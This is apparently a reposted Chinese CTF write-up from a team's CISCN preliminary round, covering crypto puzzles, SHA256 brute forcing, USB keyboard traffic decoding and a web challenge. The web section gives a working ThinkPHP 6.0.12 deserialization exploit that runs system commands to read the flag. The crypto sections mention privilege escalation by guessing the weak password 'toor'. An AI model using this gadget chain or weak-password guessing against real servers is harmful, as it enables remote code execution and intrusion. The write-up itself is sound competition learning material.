Debuggerrr?战队CISCN初赛解题记录
Debuggerrr?战队CISCN初赛解题记录
十二惊惶
发布于 2024-02-28 20:28:17
发布于 2024-02-28 20:28:17
Crypto
签到电台
签到题,开始没看到豪密剖析,对照密码表一个一个找的,额。将7个电码和密码本前28个数字每四个一组进行模十加法,看示例是加猜测全部是加运算,得到电码答案后send即可。
基于挑战码的双向认证
密码学题目,但完全不是以密码学方法完成的…该题是一道双向验证密文题目,根据题目文档进入 src/login_user 模块,分析proc_login_response函数。一顿分析后发现很多函数看不懂,突然想到题目说明服务端验证函数已完成,找到login_server模块进入查看函数,对照两函数,但是不知道怎么计算Mb来和 Mb对比,思路线索断了。
题目存在flag验证机制,猜测靶机存在flag文件,开始暴力查找。
首先尝试文件名搜索,排除若干无权限文件得到两个 txt 文件,尝试提交,正确。
基于挑战码的双向认证2
同上。
基于挑战码的双向认证3
采取前两道题的思路,无果。 尝试弱密码**(toor)**,提权成功,再次暴力搜索找到flag文件。
ISO9798
看提示ISO9798-2,额。。没怎么接触过,直接nc看题,发现得知sha256的后部分,直接爆破。
import hashlib
data= 'Gt1DDTjUUYIuQscO'
res = 'e9e04036a480e68bb4d3897939bafd6dec3767ac9d552d17e000709ac08fefa7'
for i in range(127):
for j in range(127):
for k in range(127):
for m in range(127):
s = chr(i) + chr(j) + chr(k) + chr(m) + data
if hashlib.sha256(s.encode('utf-8')).hexdigest() == res:
print(s)
break
s = 'YWAVGt1DDTjUUYIuQscO'第二步提示发送一个128bit的16进制数,python随机生成一个。
第三步给了Encrypt(rA||rB||B, k),要求给出Encrypt(rB||rA, k),并未给出加密函数,因此猜测是在明
文上动一些手脚即可。猜测为ECB或者CBC轮换加密。
最后根据加密结果为96位,并且轮换参数有rA,rB,B三个,猜测为ECB加密并且分三组轮换,因此
rA,rB和B分别对应密文三部分,要求Encrypt(rB||rA, k),只需取给出密文的前64位倒置轮换即可。
s = '83368a8ab47877c4e739d1455a6f15211716f83438b58feba5a83f3c3a5c5774847790a60378dbb 4f39c6400337bbe8c'
print(s[32:64] + s[:32])
res = '1716f83438b58feba5a83f3c3a5c577483368a8ab47877c4e739d1455a6f1521'PWN
login-nomal
拿到文件后,首先 check 一下保护措施,全绿…保护全开
Misc
问卷调查
问卷结束后得flag。
ez_usb
首先题目给的提示是这个是键盘流量,那么我们搜索8个字节长度的数据包,这里发现有两个Destination的数据包的长度是8,说明键盘给两个地方输入了值。
利用tshark分别提取出压缩包和压缩密码
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.8.1"' -T fields -e usb.capdata > 1.txt
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.10.1"' -T fields -e usb.capdata > 2.txt再利用脚本
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
def out(file):
keys=open(file)
output = []
for line in keys:
try:
if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
else:
output += ['[unknown]']
except:
pass
keys.close()
flag=0
print("".join(output))
for i in range(len(output)):
try:
a=output.index('<DEL>')
del output[a]
del output[a-1]
except:
pass
for i in range(len(output)):
try:
if output[i]=="<CAP>":
flag+=1
output.pop(i)
if flag==2:
flag=0
if flag!=0:
output[i]=output[i].upper()
except:
pass
print ('output :' + "".join(output))
print()
out("1.txt")
out("2.txt") 然后用Notepad++打开转ASCII保存,再用rar打开,输入密码即可拿到flag…..
但是当时我们做的时候,确实没想到这个是个压缩包,把信息提取出来了,看到了内容….没往压缩包上考虑
Web
Ezpop
- Thinkphp6.0.12LTS 反序列化漏洞https://www.jianshu.com/p/92018015ec5e
- Exp.php
<?php
namespace think{
abstract class Model{
private $lazySave = false;
private $data = [];
private $exists = false;
protected $table;
private $withAttr = [];
protected $json = [];
protected $jsonAssoc = false;
function __construct($obj = '')
{
$this->lazySave = True;
$this->data = ['whoami' => ['cat /flag*']];
$this->exists = True;
$this->table = $obj;
$this->withAttr = ['whoami' => ['system']];
$this->json = ['whoami',['whoami']];
$this->jsonAssoc = True;
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{
}
}
namespace{
echo(serialize(new think\model\Pivot(new think\model\Pivot()))); }本文参与?腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-06-09,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读